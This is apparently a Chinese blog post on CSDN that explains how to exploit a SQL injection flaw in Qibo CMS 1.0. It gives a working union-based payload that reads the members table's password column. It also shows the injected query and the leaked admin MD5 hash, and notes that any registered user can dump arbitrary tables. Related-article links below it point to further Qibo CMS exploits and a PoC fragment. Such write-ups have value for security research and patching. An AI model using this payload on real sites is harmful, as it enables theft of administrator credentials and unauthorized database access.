齐博CMS1.0全版本的sql注入漏洞

最新推荐文章于 2024-05-07 12:51:18 发布
最新推荐文章于 2024-05-07 12:51:18 发布
阅读量3.3k 收藏
点赞数 1
分类专栏: php 文章标签: qibo cms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HuaErHuaDeXiaoWu/article/details/79800738
版权

详见:http://dingody.iteye.com/blog/2195864

这里只说一下最后的利用,还是使用原作者指出的那个注入点,


虽然value值保存在了两个sql语句里面,这两个语句的列不一样,如果利用第二个语句,会在第一个语句的时候报列不一致的错误;尝试利用第一个语句。

我构造的语句是  1' union select password from qibosoft_members;#

这里最后只能用#来注释掉最后的单引号,使用--仍然会报错。


所以,拼接出来的sql语句是SELECT aid FROM qibosoft_comment WHERE cid='1' union select password from qibosoft_members;#'

读取用户表中的密码列;打印出执行语句的返回值


 'aid' =>  '21232f297a57a5a743894a0e4a801fc3' (length=32)

打印出的是用户admin的加密密码,MD5解密即可。

同理,修改表名和列名可以任意读取表的内容。

不过想要利用该点需要登陆member系统,只要随意注册一个用户登陆即可,便可以读取到用户admin的密码。

这里返回的只是第一行的结果。



yukialiu
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
齐博CMS变量覆盖导致sql注入漏洞分析
55的专栏
03-11 1662
齐博CMS变量覆盖导致sql注入漏洞分析 漏洞具体详情见http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13。 1. 根据阿里文章会员中心评论管理member/comment.php中存在变量cidDB未初始化,所以从此处开始利用对评论批量删除,抓包查看 2.exp利用局变量$_FILES的注册变量
齐博1.0版本的变量覆盖与命令执行漏洞
wanwan的博客
03-21 695
齐博1.0版本的变量覆盖与命令执行漏洞。详见niexinming的博客:http://blog.csdn.net/niexinming/article/details/53153629此处主要记录一下思路;首先,fujsarticle.php中,在中部有一个请求加载其他文件require_once(dirname(__FILE__)."/global.php");,在require_once前后...
2024年网络安最新Web安SQL注入_web注入,面试阿里
最新发布
2401_84302507的博客
05-07 790
当字段数位 4 时发生报错,说明字段数为 3。知道字段数后就可以利用 union 进行一个联合注入了。这里为什么要把 1 修改成 -1 呢?因为我们需要利用报错得到回显位,图上的回显位为 2 和 3,所以我们需要将 SQL 语句输入在 2 和 3 上,如:database()、user()、version() 等。得知数据库名后下一步获取表,获取当前数据库 security 库的表。此时获取到了 security 库中的部表后下一步获取 users 表中的部字段名,因为这个表比较诱人嘛。
php代码审计【24】齐博CMS xss 漏洞漏洞
司徒荆的博客
07-12 964
齐博CMS xss 漏洞漏洞
php代码审计【25】齐博CMS 无限制put 漏洞
司徒荆的博客
07-12 769
齐博CMS 无限制put 漏洞 无限制put
php代码审计【23】齐博CMS通杀漏洞漏洞
司徒荆的博客
07-09 2076
齐博CMS通杀漏洞漏洞
齐博CMS X1.0
10-10
用户可以通过阅读此文件了解如何启动和管理齐博CMS X1.0。 `index.php` 是网站的入口文件,当用户访问网站根目录时,服务器将执行这个文件中的代码。在CMS系统中,它通常是整个框架的启动点,负责处理请求并加载...
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
qibov7sql注入漏洞通杀
01-08
qibov7sql注入漏洞通杀
齐博CMSX1.0PHP永久开源框架
08-05
齐博X1.0是参阅众家之所长而开发出来的系统,秉承PHP开源精神,齐博X1.0框架永久开源免费使用(也可免费用于商业),不区分商业版与免费版。 但为了能持续发展,引入更多的开发者,后续的插件与模块会有免费与收费...
X1正式对外公开发布
06-07 140
程序下载地址: 本站下载:http://www.php168.com/x1.zip 第三方站点下载https://gitee.com/qibosoft/x1_of_cms 提示:程序会频繁更新,在码云那里会有部分更日志,即使你下载的程序还没得到及时更新,但你安装...
齐博CMSsql注入漏洞学习
dingo的小黑屋
03-26 1294
       今天看到了asrc上面对某个cms漏洞分析的文章(http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.96tpib&id=13 ),感觉阿里大牛在写漏洞分析的时候还是有点谨慎,利用方式什么就更不能说了。        百度搜了一下这个CMS,使用量还是不小的。对php不太懂,简单学习了一下,并且总结了利用方式。 ...
齐博CMS变量覆盖漏洞exp
热门推荐
Exploit的小站~
05-10 1万+
 漏洞的具体分析在 http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13,下面公布一下我写的漏洞利用以及exp。 利用步骤如下: (1)首先访问/member下面的“评论管理”功能,抓包 (2)在httprequest中构造一个attachment,如下: POST /qibo/mem...
php代码审计之熊海cms
Zlirving_的博客
05-01 1237
  X00代码审计之旅 刚接触代码审计,所以找了个入门级别的php源码熊海cms进行审计。如果大佬发现有错误请告知哦~   熊海cms下载地址:http://js.down.chinaz.com/201503/xhcms_v1.0.rar 使用的是Seay审计工具,听说误报常用。但是作为新手,也可以培养自己检测误报的能力 开始实验吧~ (先自动审计一波) X01文件包含 举...
梦想CMS注入漏洞分析&发现小彩蛋
weixin_42508548的博客
11-24 2699
查资料的时候,偶然间看到这样一个漏洞,在一个提交表单的地方,插入SQL语句,便可以进行报错注入。看着有点像二次注入,对于这样类型的注入,我个人遇到的还是比较少的,再加上一般这种地方多数会尝试XSS,所以进行了分析,看看漏洞到底是如何产生的。 0x02 环境搭建 1、首先准备phpstudy,这里使用的是2016版本的,php版本为5.6.27 2、下载cms源码 cms下载地址:http://www.lmxcms.com/file/d/down/xitong/20210
齐博CMSV7任意文件读取漏洞批量测试POC
m0_46371267的博客
04-22 1398
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。 # -*- coding:utf-8 -*- import requests import re import urllib import base64 def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():
齐博1.0版本后台getshell漏洞复现
wanwan的博客
04-02 1775
思路整理并详细说明了一下01用户登陆判断的地方admin/global.php在用户不存在地方呢执行了一个eval():eval(base64_decode("Y$webdb[_Notice]"));该参数打印出来:copy("http://www.php168.com/Notice/?url=$webdb[www_url]",PHP168_PATH."cache/Notice.php");将一个...
Victor CMS SQL注入漏洞( CVE-2022-26201)
千寻的博客
12-01 1847
Victor CMS v1.0 存在二次注入漏洞
齐博X1教程集:从新手入门到高级技巧
9. **数据转换**:教程还涉及其他CMS系统(如水平凡、lvyecms)向齐博X1的数据转换,方便用户迁移原有内容。 10. **模型字段内容页面调用**:针对内容模型的字段,教程给出了如何在页面上进行有效调用的技巧,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值